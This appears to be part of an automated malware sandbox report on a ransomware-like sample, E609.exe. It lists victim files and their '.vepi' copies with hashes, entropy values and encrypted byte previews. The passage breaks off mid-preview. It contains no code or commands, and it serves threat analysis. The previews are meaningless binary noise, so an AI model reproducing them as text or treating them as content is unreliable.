.........UM.....".odXijk..s..V.........#([........Z..6..=...W...O...T...T....fq;.V...1\..]....$.......M.%.@.......p.?xk_...^...u_.F.Tt.2{....F....9o.W.....d....y7..S.'j.........b6h..a...e....qEf-..V.0..x.z.x..J.W7U.B....r.K..b.c.N.Xs...]..J.&\....3..[B..e......NOL...K.M.cU.........,z.c:V.f...D3....;.>...6..oDI}.K@=>.....Y.2.h..w.+....8s.n.i....D..............z....

C:\Users\user\Desktop\XZXHAVGRAG\UMMBDNEQBN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.88146405562116
Encrypted:	false
SSDEEP:	24:+2z9zKFYPBsSYPOwNOXAT5OUw5vNNMFPsJDn7wn6tC0cRs6F+oWX9Vej21SRbD:+o9zkCDGpOX+5xwX6mDnG6I0V6FW9c2Y
MD5:	8270630E402D3A679344BAFC3D2095EB
SHA1:	FCB41C89E8952BA9AD3E167F147385A229EDE047
SHA-256:	24236DCF8DAD0629BE0602B1C8199B8E1766B11C06B06FB1121511C4FD08A9B5
SHA-512:	542AA623D1F804C8C2A2F55203EE1D9F41F4335E2EBB327493DA1CF55D845CE9A3B37E5C9FF240E32493A6CF539A7FBE62F9A55F06E11207165EA84CF25A4A10
Malicious:	true
Preview:	UMMBDI.s.x.5.s....yZL..v:.e&.5....T..z...U\....d.._.b...]!.........1%.YDE........z..</..=....w.t..D..R...{...N+,..........b..s.3..C._......".`o....W.qQ..vKT.%9.(....w.:..).....?z..#.-....U2K.o....E..R._#Z.re,Q.J.g.t..........\|....t......i..m.._<.=...G....m.D.s(......U(.....ju...~.,..;....W.........G....\..... "...h".."(..~^......R9w...5.=.:....U?{.....n,.;..... (C......)AZ...EX%6SW\..SCk:.G.b.1C.I.Iq.9/x.s.PE....N....i>@..\|b....y....w..@a..."D..Md..vN...0...C..9..j.A.ae.U.g........49#.......F..p......[......Hs.........K..4..."...(N...\|..-.0...Gy..2S..Gef.....r..g.. ........"...F/A.(.1AuS.8..KH....R..u...v........y.G....f..M..B....C...B.L.s...?..O~.).\@.Jd.\|.....ti.C"".\|.e1...%..mZ..n.V..AL.pn..DP_...[.In...7..B.=+$......'\.a....oF .'..R........>..'1]...G`.y.m.k.B.H..^Wa..Z..br..su.$.<.....Vwt.._}c..T..`C9.n...f...y.C..K.....D..r......ci.Q.P.3.......g]I;m f....hm..&Mu.....s@a.1Oi.x....Q...>(&..c..Ov;..@i.t..pq.X...2l.F.....V-I..8.K.5#

C:\Users\user\Desktop\XZXHAVGRAG\UMMBDNEQBN.xlsx.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.88146405562116
Encrypted:	false
SSDEEP:	24:+2z9zKFYPBsSYPOwNOXAT5OUw5vNNMFPsJDn7wn6tC0cRs6F+oWX9Vej21SRbD:+o9zkCDGpOX+5xwX6mDnG6I0V6FW9c2Y
MD5:	8270630E402D3A679344BAFC3D2095EB
SHA1:	FCB41C89E8952BA9AD3E167F147385A229EDE047
SHA-256:	24236DCF8DAD0629BE0602B1C8199B8E1766B11C06B06FB1121511C4FD08A9B5
SHA-512:	542AA623D1F804C8C2A2F55203EE1D9F41F4335E2EBB327493DA1CF55D845CE9A3B37E5C9FF240E32493A6CF539A7FBE62F9A55F06E11207165EA84CF25A4A10
Malicious:	false
Preview:	UMMBDI.s.x.5.s....yZL..v:.e&.5....T..z...U\....d.._.b...]!.........1%.YDE........z..</..=....w.t..D..R...{...N+,..........b..s.3..C._......".`o....W.qQ..vKT.%9.(....w.:..).....?z..#.-....U2K.o....E..R._#Z.re,Q.J.g.t..........\|....t......i..m.._<.=...G....m.D.s(......U(.....ju...~.,..;....W.........G....\..... "...h".."(..~^......R9w...5.=.:....U?{.....n,.;..... (C......)AZ...EX%6SW\..SCk:.G.b.1C.I.Iq.9/x.s.PE....N....i>@..\|b....y....w..@a..."D..Md..vN...0...C..9..j.A.ae.U.g........49#.......F..p......[......Hs.........K..4..."...(N...\|..-.0...Gy..2S..Gef.....r..g.. ........"...F/A.(.1AuS.8..KH....R..u...v........y.G....f..M..B....C...B.L.s...?..O~.).\@.Jd.\|.....ti.C"".\|.e1...%..mZ..n.V..AL.pn..DP_...[.In...7..B.=+$......'\.a....oF .'..R........>..'1]...G`.y.m.k.B.H..^Wa..Z..br..su.$.<.....Vwt.._}c..T..`C9.n...f...y.C..K.....D..r......ci.Q.P.3.......g]I;m f....hm..&Mu.....s@a.1Oi.x....Q...>(&..c..Ov;..@i.t..pq.X...2l.F.....V-I..8.K.5#

C:\Users\user\Desktop\XZXHAVGRAG\WUTJSCBCFX.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.836214458152187
Encrypted:	false
SSDEEP:	24:9WiVNOkw2BTL7/CWXR/A/Ng0xt6zCE0AgQFpc5qD/8iso4DNMt9g5accxzyObD:HNb/6WXR4l1rwCE0A5QqwTj6ysD
MD5:	E9C5118D807C64167DF7EFC2D7B6D0D1
SHA1:	B36BD0EF22DAD6AB8226E9906ADEC464882DE769
SHA-256:	8FE637465E66C3550696FBB1C8553644062B04D3C4EB008F9A03365E93867C38
SHA-512:	E72CFE789F41F43EF08CB06CF90EA2062F8F3BFC7FB763BA7B7BB816E7B7821B9DA4A512D357B85942F268FCB08F174EEE4968EBE7100DD4A8C231A27F8586C7
Malicious:	false
Preview:	WUTJS{.z.......T.OY...m.v.J.PE..=7...(.Z...........s...P..(t.....E..of....;..b3.2..(......X..FG."e/B.w..tJ+...\|4.....t.W.w..lJ5.....>.TT...0.W{..r;G......p7..n@J.....g.........e$l........c9T.D.-c.ah.....".{.v5...OD9.>...W,s&^~&..q.'.. bh#..m......V.b.......h./....h,(DH.{.M.3..........a.....jrC.. ...=...UP..w,./Fe...`.....n..,..3g..z...K6........f>V.Sy.x{b!...zC...k..8v#i.f....A.G...[mX5k4up..%.......Z.\..9U....(..5_R..7.....1....xl..G..\./..A.T.m....).qK..H#W..]..Ly.TR<.W...t~...!/.9.....u...)@.hu......d..........=z....n.t[.Z]g.['..vUd.Y. 8.a.SK%%mZ>..G..k.S...A.v..t./.7.N-..,.c..D.m./Eo...!g.j.L..j........r.L[...2..u.3a.`.z......2.. aK^...jv.....o........N.je-.>..j.czrJ.Bd.`...\|...q........r.5.....rVg"4.dpy...'Q.w2...0.....A......#d.z.....{..f...S!...Zs.B..G....L..Yy......b....O3+.yL.Y&.yE...;m............Uw.....Z.....\....^l.O...L%I"...s.UNY...P.}**f..JaJ,.y.2d.v^.Jb.x....2........0.`L.L... ~.F..n....1.~Q...s<R0..g..G{m/.

C:\Users\user\Desktop\XZXHAVGRAG\WUTJSCBCFX.jpg.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.836214458152187
Encrypted:	false
SSDEEP:	24:9WiVNOkw2BTL7/CWXR/A/Ng0xt6zCE0AgQFpc5qD/8iso4DNMt9g5accxzyObD:HNb/6WXR4l1rwCE0A5QqwTj6ysD
MD5:	E9C5118D807C64167DF7EFC2D7B6D0D1
SHA1:	B36BD0EF22DAD6AB8226E9906ADEC464882DE769
SHA-256:	8FE637465E66C3550696FBB1C8553644062B04D3C4EB008F9A03365E93867C38
SHA-512:	E72CFE789F41F43EF08CB06CF90EA2062F8F3BFC7FB763BA7B7BB816E7B7821B9DA4A512D357B85942F268FCB08F174EEE4968EBE7100DD4A8C231A27F8586C7
Malicious:	false
Preview:	WUTJS{.z.......T.OY...m.v.J.PE..=7...(.Z...........s...P..(t.....E..of....;..b3.2..(......X..FG."e/B.w..tJ+...\|4.....t.W.w..lJ5.....>.TT...0.W{..r;G......p7..n@J.....g.........e$l........c9T.D.-c.ah.....".{.v5...OD9.>...W,s&^~&..q.'.. bh#..m......V.b.......h./....h,(DH.{.M.3..........a.....jrC.. ...=...UP..w,./Fe...`.....n..,..3g..z...K6........f>V.Sy.x{b!...zC...k..8v#i.f....A.G...[mX5k4up..%.......Z.\..9U....(..5_R..7.....1....xl..G..\./..A.T.m....).qK..H#W..]..Ly.TR<.W...t~...!/.9.....u...)@.hu......d..........=z....n.t[.Z]g.['..vUd.Y. 8.a.SK%%mZ>..G..k.S...A.v..t./.7.N-..,.c..D.m./Eo...!g.j.L..j........r.L[...2..u.3a.`.z......2.. aK^...jv.....o........N.je-.>..j.czrJ.Bd.`...\|...q........r.5.....rVg"4.dpy...'Q.w2...0.....A......#d.z.....{..f...S!...Zs.B..G....L..Yy......b....O3+.yL.Y&.yE...;m............Uw.....Z.....\....^l.O...L%I"...s.UNY...P.}**f..JaJ,.y.2d.v^.Jb.x....2........0.`L.L... ~.F..n....1.~Q...s<R0..g..G{m/.

C:\Users\user\Desktop\XZXHAVGRAG\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.851451899437236
Encrypted:	false
SSDEEP:	24:xOdsLhP72X0nJdN1SlIWho0jQPDx5Tw+KPL7DwfoXz/7w/LbD:xOqlnPyrumQPb1+L78fszavD
MD5:	5D5C6DF1ECBBD89BB37E39E355921FD0
SHA1:	D2D772546736D7E88BB4D9340670848AB0883795
SHA-256:	DD5796E8A426A6F085EB88F971DAAD218BBC78ABC33853B5075D3F187E2ED6C9
SHA-512:	A09EC912A53613DC9666A3ED3485BAD29E055C04FA2FEA15C6A6CDEEB92A51C3BAB1B09409D4F048B2E98A87FEB6303FC28C2C56320C80D54168E0ABB1B5E639
Malicious:	false
Preview:	XZXHAVm..N7`..../CD.J...R.]...H..g.......@...V....$.0X.I...l.=.,........H...%-.J}..:..@...X.....d....7..-.Fu...Z1.....x...%?.!Q..........^..Q$c..v@.q..[..7...Rj.1=.z;..S>..^.......~G....ejs.I.}.....l.)._..{..\|.t..i..!....[.i&.........-..K....g.....x..`~J.\|W.......v[j.)C..(......#`..3,A.iy.K.........s..#..Y.6.C.....eO.@..R2..z..;K..`[...{..V.Q..;\|..c.rvV.H.../55.g.~...\|G..'c.).&"..G.LP4.rq...+y..3C{...H,UCQHA8.0.#nL......j.)5J.....~.7........'.&.2Lg....5...<T_..l..@.t...q...Az..%L......qF..h=r?R.N.z........e..9.B(!b...W.i..A..`m.....@7.^X#..h..E...X0........f.K..~....z....}.J+..)t....O......$.q+./..Z...'r.[.U.z.r.x7..}23.7.2.....#.A.>..N.s.CX{~..}...gw.U...p>..Q.`..^%..5.S..B.f..y..n..+....39..P`..&_K.(7.[.y..8p..m.~..7V....fG....\.......LD..$.(...E.]g....4.#..i. .9.}.\.<......P....-...@.........H/.~.>...........R..w......0.0.Tc.......<..jy.6..^....bM.Sd.dV.l5yK.^......>.(.a...,.KE...~.?.......W.....y.8.hn..@f+..0..h.M.5c-..D2.

C:\Users\user\Desktop\XZXHAVGRAG\XZXHAVGRAG.docx.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.851451899437236
Encrypted:	false
SSDEEP:	24:xOdsLhP72X0nJdN1SlIWho0jQPDx5Tw+KPL7DwfoXz/7w/LbD:xOqlnPyrumQPb1+L78fszavD
MD5:	5D5C6DF1ECBBD89BB37E39E355921FD0
SHA1:	D2D772546736D7E88BB4D9340670848AB0883795
SHA-256:	DD5796E8A426A6F085EB88F971DAAD218BBC78ABC33853B5075D3F187E2ED6C9
SHA-512:	A09EC912A53613DC9666A3ED3485BAD29E055C04FA2FEA15C6A6CDEEB92A51C3BAB1B09409D4F048B2E98A87FEB6303FC28C2C56320C80D54168E0ABB1B5E639
Malicious:	false
Preview:	XZXHAVm..N7`..../CD.J...R.]...H..g.......@...V....$.0X.I...l.=.,........H...%-.J}..:..@...X.....d....7..-.Fu...Z1.....x...%?.!Q..........^..Q$c..v@.q..[..7...Rj.1=.z;..S>..^.......~G....ejs.I.}.....l.)._..{..\|.t..i..!....[.i&.........-..K....g.....x..`~J.\|W.......v[j.)C..(......#`..3,A.iy.K.........s..#..Y.6.C.....eO.@..R2..z..;K..`[...{..V.Q..;\|..c.rvV.H.../55.g.~...\|G..'c.).&"..G.LP4.rq...+y..3C{...H,UCQHA8.0.#nL......j.)5J.....~.7........'.&.2Lg....5...<T_..l..@.t...q...Az..%L......qF..h=r?R.N.z........e..9.B(!b...W.i..A..`m.....@7.^X#..h..E...X0........f.K..~....z....}.J+..)t....O......$.q+./..Z...'r.[.U.z.r.x7..}23.7.2.....#.A.>..N.s.CX{~..}...gw.U...p>..Q.`..^%..5.S..B.f..y..n..+....39..P`..&_K.(7.[.y..8p..m.~..7V....fG....\.......LD..$.(...E.]g....4.#..i. .9.}.\.<......P....-...@.........H/.~.>...........R..w......0.0.Tc.......<..jy.6..^....bM.Sd.dV.l5yK.^......>.(.a...,.KE...~.?.......W.....y.8.hn..@f+..0..h.M.5c-..D2.

C:\Users\user\Documents\AIXACVYBSB.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8496416276776735
Encrypted:	false
SSDEEP:	24:IGokk+gP4EtZKpEje3C3kfvXr6/Vb17sLmMo27fnib6YFphsnlwAnhtiG3SbD:HHHCKpEKrndSJHgSAhtiGwD
MD5:	49BD63711FD61E93458F18D1A74B091D
SHA1:	9360F85AEEC87EC0729A7B022C26BD30BC13F58F
SHA-256:	642D3F28775D8741BFC6852E018CEEA39B97219AC243B35F301A322C03F65D7F
SHA-512:	11E094AE7E6743BF966A117020198ED8EFD32D731BA57EA086E63B7AAF1846DB1BC700B9DBFE7D517F3FF325DFF33BD5495B84ED75578C3ABAE5956D37A85C06
Malicious:	false
Preview:	AIXAC#.-Jb....l..Jz.2.....kq.............oz`....<.a.{...'......'.!.....<...T.R"..Y\|..;."..n51..e...8V\.....}..R-.......7fs..(.nvb..?.K[z..A+......0+.....il....-.~....0=r....~.;..La..E..q!.2..7.(...Wp:....c..QN...w..u.8/"_...J._..^v.n..&....e..\|t...P...,_Z]...-....B..,....$.o..!..c.[nW.....}..6c.....u:].....d......43....;.JR..UW^..Y..2...KT....!c...>.%..U.B.v.w....hc..@H.$p.7...!Q.b.....S.\|..?..b.....^.t..:.9P...sC...L]....x...4.f..6.b..,.....I[.\..q..;...2..\..st.....! f.....2.P\&K.5dccH...Vin.v.....-\..j........A.~..G....S;q\.....K..Aq...q....G.......s..;.&.K.v... .D>..}...5......%L...E..../......@...<0.Xb.U..D..a....O3.2..G......>..;.aD.5..A..6.k..O.2...dd.Uv!......S..v9.@.P...N..T2.x..@.2....z.K:]....j.s.j.g.d.H.....w.n........h..".....U.2...j.S..@.LB%J.T..y...z/..l$k*..M.F.N..>.&....\}.x.........$V.._F.....g.D...,.H.99b.33.q....eIn..r2.....'.D....d....$y..Es.t.U...$....[....)%....[G!..T.x9q.dr.v"...5...$..%.(V.&.l......z)..b.N.

C:\Users\user\Documents\AIXACVYBSB.docx.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8496416276776735
Encrypted:	false
SSDEEP:	24:IGokk+gP4EtZKpEje3C3kfvXr6/Vb17sLmMo27fnib6YFphsnlwAnhtiG3SbD:HHHCKpEKrndSJHgSAhtiGwD
MD5:	49BD63711FD61E93458F18D1A74B091D
SHA1:	9360F85AEEC87EC0729A7B022C26BD30BC13F58F
SHA-256:	642D3F28775D8741BFC6852E018CEEA39B97219AC243B35F301A322C03F65D7F
SHA-512:	11E094AE7E6743BF966A117020198ED8EFD32D731BA57EA086E63B7AAF1846DB1BC700B9DBFE7D517F3FF325DFF33BD5495B84ED75578C3ABAE5956D37A85C06
Malicious:	false
Preview:	AIXAC#.-Jb....l..Jz.2.....kq.............oz`....<.a.{...'......'.!.....<...T.R"..Y\|..;."..n51..e...8V\.....}..R-.......7fs..(.nvb..?.K[z..A+......0+.....il....-.~....0=r....~.;..La..E..q!.2..7.(...Wp:....c..QN...w..u.8/"_...J._..^v.n..&....e..\|t...P...,_Z]...-....B..,....$.o..!..c.[nW.....}..6c.....u:].....d......43....;.JR..UW^..Y..2...KT....!c...>.%..U.B.v.w....hc..@H.$p.7...!Q.b.....S.\|..?..b.....^.t..:.9P...sC...L]....x...4.f..6.b..,.....I[.\..q..;...2..\..st.....! f.....2.P\&K.5dccH...Vin.v.....-\..j........A.~..G....S;q\.....K..Aq...q....G.......s..;.&.K.v... .D>..}...5......%L...E..../......@...<0.Xb.U..D..a....O3.2..G......>..;.aD.5..A..6.k..O.2...dd.Uv!......S..v9.@.P...N..T2.x..@.2....z.K:]....j.s.j.g.d.H.....w.n........h..".....U.2...j.S..@.LB%J.T..y...z/..l$k*..M.F.N..>.&....\}.x.........$V.._F.....g.D...,.H.99b.33.q....eIn..r2.....'.D....d....$y..Es.t.U...$....[....)%....[G!..T.x9q.dr.v"...5...$..%.(V.&.l......z)..b.N.

C:\Users\user\Documents\AIXACVYBSB\AIXACVYBSB.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.863235650426532
Encrypted:	false
SSDEEP:	24:lVzBKsE9Z9mDsZKfKpA0B6zi6uQlBll50ZomEMxstX5ZBoPL/3M0NA4OGxAObD:lJBUn9mD4KfobBfIBl2AMxstXhoP9Nzr
MD5:	C733C0B5EC0CC9B0A64D756731AE01B6
SHA1:	86514839C64C0B95B17FABCD4E91AE782BD5AC22
SHA-256:	523BF809A0AAD8B5DF7038DCD07E50021DEC0FA09020C4CCA40CA8624ADD889D
SHA-512:	2433A2AFC7D3BA805744D837744F5B25BE5A04E7D2FED4ACBE390C9ACCB5B4A06C9F1B567F8AEFAA49D7FEFC382246F7ABC5710D8FF390CD56097DD3CBB9453A
Malicious:	false
Preview:	AIXAC4.f..S...p....x?..6...!...lI..1.......\|y2..@.EH....w......d=P...T...)..\|`.@\.?N...?..4.<.[-.b+j......e.I.r.!.....L-S.Cj..+.......!a]s;.F.%...X...{9..4W.7Q..d....wt.v...Q..pSU.......a...p.v20..{v...D..PM.<.`....-.M]k..D.......N)....0....(..\R...%m.\........N.j....3.....F......SzoJ..C.B.h..[)..5..8.=/%..W.$.........%....Ta?.P.(........4......>~@.V.Y@....Y#...h...!.I.jDoO....P.G/..v...k'...in".J...f"..Gq..v.T....<..e.'.n`7(...p...{ty^..juN;.=.j........x^F...F.b..0...^.~...[C...e.a..y\|]n......Q..w...7_.j.z.qD...!..u?}.A..-I..K{A.f\|..L...Eh...=..]U_......e..](H.pf.T...e..O.{....8:.~.....Y..z$...~PQp.]..$.].A..G..e.M=.......}yY4J....Q.....l....#o...$.b.3...J.S\i......=L..../'&q...H.0@..k."....w..S....-..G..C.x.t.6{&......u...2y.T0.....a.<.+K.[...N.A%h.1.6).e...S.\|..h...A.........O/..'............S ....Y..t....b.....rU\|...y.m...,bu...s..$./R......;o....T...b..Z.^.ddBA..%..!...c)W.\|..y{DQ...KO..o.vI...].i..4.ZM@uV@E^.m..z.t.$-%...

C:\Users\user\Documents\AIXACVYBSB\AIXACVYBSB.docx.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.863235650426532
Encrypted:	false
SSDEEP:	24:lVzBKsE9Z9mDsZKfKpA0B6zi6uQlBll50ZomEMxstX5ZBoPL/3M0NA4OGxAObD:lJBUn9mD4KfobBfIBl2AMxstXhoP9Nzr
MD5:	C733C0B5EC0CC9B0A64D756731AE01B6
SHA1:	86514839C64C0B95B17FABCD4E91AE782BD5AC22
SHA-256:	523BF809A0AAD8B5DF7038DCD07E50021DEC0FA09020C4CCA40CA8624ADD889D
SHA-512:	2433A2AFC7D3BA805744D837744F5B25BE5A04E7D2FED4ACBE390C9ACCB5B4A06C9F1B567F8AEFAA49D7FEFC382246F7ABC5710D8FF390CD56097DD3CBB9453A
Malicious:	false
Preview:	AIXAC4.f..S...p....x?..6...!...lI..1.......\|y2..@.EH....w......d=P...T...)..\|`.@\.?N...?..4.<.[-.b+j......e.I.r.!.....L-S.Cj..+.......!a]s;.F.%...X...{9..4W.7Q..d....wt.v...Q..pSU.......a...p.v20..{v...D..PM.<.`....-.M]k..D.......N)....0....(..\R...%m.\........N.j....3.....F......SzoJ..C.B.h..[)..5..8.=/%..W.$.........%....Ta?.P.(........4......>~@.V.Y@....Y#...h...!.I.jDoO....P.G/..v...k'...in".J...f"..Gq..v.T....<..e.'.n`7(...p...{ty^..juN;.=.j........x^F...F.b..0...^.~...[C...e.a..y\|]n......Q..w...7_.j.z.qD...!..u?}.A..-I..K{A.f\|..L...Eh...=..]U_......e..](H.pf.T...e..O.{....8:.~.....Y..z$...~PQp.]..$.].A..G..e.M=.......}yY4J....Q.....l....#o...$.b.3...J.S\i......=L..../'&q...H.0@..k."....w..S....-..G..C.x.t.6{&......u...2y.T0.....a.<.+K.[...N.A%h.1.6).e...S.\|..h...A.........O/..'............S ....Y..t....b.....rU\|...y.m...,bu...s..$./R......;o....T...b..Z.^.ddBA..%..!...c)W.\|..y{DQ...KO..o.vI...].i..4.ZM@uV@E^.m..z.t.$-%...

C:\Users\user\Documents\AIXACVYBSB\DTBZGIOOSO.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.84638138850693
Encrypted:	false
SSDEEP:	24:7x0Y+ei/uiRDLtUvTjkITKLkQ/RZL/sFdrVpqxbQ1cys1pLS9xoPeKAmiLulIbD:2DsToLkQ/RR/svrVIbwAYfKASQD
MD5:	9FBE482249A215487AABFCBCFEC658B1
SHA1:	2FC239BBDD3B0FCC7023BEEB0A62416D3F3BC9E5
SHA-256:	148D29E0CD3F3241335184EFC571F65353DB79ABFBE4F2D20547956ED7C88710
SHA-512:	D9AE76C7729DBD4EA70CF543AAE61DC9545221259BC8ABD5EDA549D6A48423D92D294CB8CC6F32178CEC70632C62AACDC00D18E63F57BA74D081578A2411D759
Malicious:	false
Preview:	DTBZG..?,.,...@3..ED.nJ$._.....;....`..ni.H.X..%.%.~.0.0.X......a.(e.L.g.V..g.K$..\.5....z.q/..3..[....eZ...".o[..t3m....u.......g.s.Ia...P..u.b._,.1mSQ.....h$...F.......,....$P" V.>..\|..8..YxPQ....Q.1T7...Btn..av.~F+..A..,...f..U.....S.4....}.,Z....\..eY[.....A..r..,ZA...R..1D...........D8..h.....7 ....mx..7_.(.j:...#....,......+..w...3....R....y..A...4l..3n..]b.....RP.....Z%....`r....5]~..$....Q..}F]...I.`-q...mq.E.w.qV0....>.p.2CZ..w.LiI./Yn~........(...-.G...!........8g.....,....^.n........"........,...yp14.o..^t.B..r.Sq.!...'.2...!...8>.iIV...OIk..n.t..^L.u.aUT0.R.1.g.....#....u(.^..R._.I....5.iWS.4...G.T.U..^..2.#..].W.r@\{'M.@.-.+.vn......e-w...e.1O.r.@.+...P.G.ghF.J...+.....)v..!R~K....."v...[L.fk....+....G.i.-..#..#....\c.!......{6..z.%.,p.z$.Wx...6.H.g.....m.k....... <.MZ.O.J......w.[......2.<....~...dl....8o1...ZX..{]..1..r...@..;A..ol..F...IU..H.vmkTF...X.s..Fq...F......D\|hO.](.:e.i.v.:~T.}...b.h.W.......:..t......]r...jRG...6

C:\Users\user\Documents\AIXACVYBSB\DTBZGIOOSO.xlsx.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.84638138850693
Encrypted:	false
SSDEEP:	24:7x0Y+ei/uiRDLtUvTjkITKLkQ/RZL/sFdrVpqxbQ1cys1pLS9xoPeKAmiLulIbD:2DsToLkQ/RR/svrVIbwAYfKASQD
MD5:	9FBE482249A215487AABFCBCFEC658B1
SHA1:	2FC239BBDD3B0FCC7023BEEB0A62416D3F3BC9E5
SHA-256:	148D29E0CD3F3241335184EFC571F65353DB79ABFBE4F2D20547956ED7C88710
SHA-512:	D9AE76C7729DBD4EA70CF543AAE61DC9545221259BC8ABD5EDA549D6A48423D92D294CB8CC6F32178CEC70632C62AACDC00D18E63F57BA74D081578A2411D759
Malicious:	false
Preview:	DTBZG..?,.,...@3..ED.nJ$._.....;....`..ni.H.X..%.%.~.0.0.X......a.(e.L.g.V..g.K$..\.5....z.q/..3..[....eZ...".o[..t3m....u.......g.s.Ia...P..u.b._,.1mSQ.....h$...F.......,....$P" V.>..\|..8..YxPQ....Q.1T7...Btn..av.~F+..A..,...f..U.....S.4....}.,Z....\..eY[.....A..r..,ZA...R..1D...........D8..h.....7 ....mx..7_.(.j:...#....,......+..w...3....R....y..A...4l..3n..]b.....RP.....Z%....`r....5]~..$....Q..}F]...I.`-q...mq.E.w.qV0....>.p.2CZ..w.LiI./Yn~........(...-.G...!........8g.....,....^.n........"........,...yp14.o..^t.B..r.Sq.!...'.2...!...8>.iIV...OIk..n.t..^L.u.aUT0.R.1.g.....#....u(.^..R._.I....5.iWS.4...G.T.U..^..2.#..].W.r@\{'M.@.-.+.vn......e-w...e.1O.r.@.+...P.G.ghF.J...+.....)v..!R~K....."v...[L.fk....+....G.i.-..#..#....\c.!......{6..z.%.,p.z$.Wx...6.H.g.....m.k....... <.MZ.O.J......w.[......2.<....~...dl....8o1...ZX..{]..1..r...@..;A..ol..F...IU..H.vmkTF...X.s..Fq...F......D\|hO.](.:e.i.v.:~T.}...b.h.W.......:..t......]r...jRG...6

C:\Users\user\Documents\AIXACVYBSB\ONBQCLYSPU.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.854972051305302
Encrypted:	false
SSDEEP:	24:OEPzaG44KYmT9XEwlj9JMEDV900xaRasY3Ci56iiI84MQu9W+vlOqMWwtkbD:OEP2GfDsB9uYXXxkFEbQ4MQdEVD
MD5:	B04D79B45BF6161366B5FE6F704BBFB4
SHA1:	23B7DA9FE1933A1A17F1CF006B1CF31BDACC7F3C
SHA-256:	3516F3992DB12520F3ECDFBDA68C773F02892709188F39DD4D7C7516A1B0027D
SHA-512:	A6BB888693E4BCFF946370CC1524E8B5F81F3F9E94E58179C0891BFF0C2B1A81E38E62792BBD02DE5471D951931526904D57A1E4ED115FE6B19EA0645BDBB613
Malicious:	false
Preview:	ONBQC.Y3^.........>....iX....9...Q....z.9..L....!0..3..(.t..:~......YY...;7...@..QD.2C....#.skI..h}.(.EO.8o...S..&..i.S.).R.8Q. #..F.......&0O..P...N.....Ow..k..}...q.QJl.A.._...... ..-....U.<.f..MU(.#..pR...$.....2..'-.....\|l...7...Mw..x.d/;..-vg\|5K1....M?......G...Z....I.gO..Y.C..Z.?.E........"..U%.E`.#...ll.RL.....y#...mZ...W.}.h..N.V...z.Y...$..e7Mp..9@.ah.....4.y.....]yc....5h."T~Fx.<4..f...{.'$.LQ.PQ.Lar......j:,.@`.c(.h..$%.....Mn...i....~......!e...p..k........1r._...s.W....yd..\|../.K.T.l[.4...6....']....8..;U....1...:..G.k}.....5.g......K_.r......1..U..P......W......7][d.s2,L2....h.j..........V_.g...R1a...YgT..q...w.....g".`.F.......J..K...GP..).+u...8...pu...Y5....D...z......]\|.Pe.7........Z.:..2.]1..5.M.....4..\|5......:` Z..oi.5..XXt../...h..y._B@..F...u......n.......%..r..g.3.?.xH.w.....I5gO..7<?...^...$..1..E)..N..q.E]....,&......q.........Au.{.".Ij5p....2...u.....5_t.....Lg..[..3..I..#.....].q..kE.\ s.........'..d..9<

C:\Users\user\Documents\AIXACVYBSB\ONBQCLYSPU.jpg.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.854972051305302
Encrypted:	false
SSDEEP:	24:OEPzaG44KYmT9XEwlj9JMEDV900xaRasY3Ci56iiI84MQu9W+vlOqMWwtkbD:OEP2GfDsB9uYXXxkFEbQ4MQdEVD
MD5:	B04D79B45BF6161366B5FE6F704BBFB4
SHA1:	23B7DA9FE1933A1A17F1CF006B1CF31BDACC7F3C
SHA-256:	3516F3992DB12520F3ECDFBDA68C773F02892709188F39DD4D7C7516A1B0027D
SHA-512:	A6BB888693E4BCFF946370CC1524E8B5F81F3F9E94E58179C0891BFF0C2B1A81E38E62792BBD02DE5471D951931526904D57A1E4ED115FE6B19EA0645BDBB613
Malicious:	false
Preview:	ONBQC.Y3^.........>....iX....9...Q....z.9..L....!0..3..(.t..:~......YY...;7...@..QD.2C....#.skI..h}.(.EO.8o...S..&..i.S.).R.8Q. #..F.......&0O..P...N.....Ow..k..}...q.QJl.A.._...... 